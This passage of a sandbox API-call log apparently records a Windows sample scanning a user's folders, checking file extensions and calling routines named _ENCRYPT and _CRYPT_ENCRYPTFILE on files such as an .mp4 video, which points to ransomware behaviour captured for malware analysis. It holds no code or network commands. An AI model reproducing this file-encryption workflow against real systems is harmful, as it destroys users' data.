lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0191.952] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.953] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.953] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.953] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 0x90add8 [0191.953] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0191.953] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.953] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 0x90add8 [0191.953] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0191.953] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.953] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.953] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.953] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.953] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.953] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.953] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0191.953] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.954] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0191.954] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.954] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0191.954] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.954] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.954] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yes", cchCount1=3, lpString2="no", cchCount2=2) returned 3 [0191.954] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.954] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.954] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.954] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0191.954] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.955] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0191.955] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.955] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0191.955] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.955] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.955] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yes", cchCount1=3, lpString2="no", cchCount2=2) returned 3 [0191.955] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.955] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.955] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.955] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0191.955] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.955] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0191.955] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.956] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0ntyy6p\\-aawcghzf1n-uznr9.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0191.957] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.957] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.957] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.957] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0191.957] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.958] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.958] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0191.958] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.958] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0191.958] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.958] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0191.958] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0191.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0191.958] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.958] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.958] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.958] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc8e0e70, ftCreationTime.dwHighDateTime=0x1d5e803, ftLastAccessTime.dwLowDateTime=0x46566030, ftLastAccessTime.dwHighDateTime=0x1d5dc83, ftLastWriteTime.dwLowDateTime=0x46566030, ftLastWriteTime.dwHighDateTime=0x1d5dc83, nFileSizeHigh=0x0, nFileSizeLow=0xfcbc, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="-AawcGHZf1n-uzNR9.mp4", cAlternateFileName="-AAWCG~1.MP4")) returned 0x90add8 [0191.958] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0191.959] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.959] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc8e0e70, ftCreationTime.dwHighDateTime=0x1d5e803, ftLastAccessTime.dwLowDateTime=0x46566030, ftLastAccessTime.dwHighDateTime=0x1d5dc83, ftLastWriteTime.dwLowDateTime=0x46566030, ftLastWriteTime.dwHighDateTime=0x1d5dc83, nFileSizeHigh=0x0, nFileSizeLow=0xfcbc, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="-AawcGHZf1n-uzNR9.mp4", cAlternateFileName="-AAWCG~1.MP4")) returned 0x90add8 [0191.959] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0191.959] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tYY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YY6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AawcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="awcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wcGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cGHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GHZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HZf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zf1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uzNR9.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.961] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.961] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0191.961] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0191.961] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0191.962] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.962] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.962] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.962] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.962] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.962] FindFirstFileW (in: 